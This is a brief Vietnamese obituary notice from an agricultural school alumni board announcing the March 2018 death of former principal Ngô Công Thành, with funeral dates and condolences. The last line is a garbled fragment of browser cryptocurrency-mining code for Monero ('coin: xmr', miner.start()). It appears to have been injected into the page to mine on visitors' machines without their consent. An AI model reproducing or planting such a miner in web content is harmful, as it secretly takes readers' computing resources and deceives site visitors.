Tin Buồn Ban Liên Lạc CHV Nông Lâm Súc Định Tường thông báo:

Tin Buồn
Ban Liên Lạc CHV Nông Lâm Súc Định Tường thông báo:


         

 
Thầy Ngô Công Thành cựu Hiệu Trưởng Trường Thí Điểm NLS Chợ Gạo

Đã từ trần ngày 9/3/2018 ( nhằm ngày 22 tháng giêng năm Mậu Tuất ) .

Thọ 85 tuổi, linh cữu quàn tại tư gia ( Chợ Gạo)
Di quan vào ngày 11/3/2018 ( nhằm ngày 24 tháng giêng năm Mậu Tuất).


Tập thể thầy cô và gia đình Nông Lâm Súc Định Tường - Bến Tre thành kính phân ưu cùng Gia đình thầy.

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();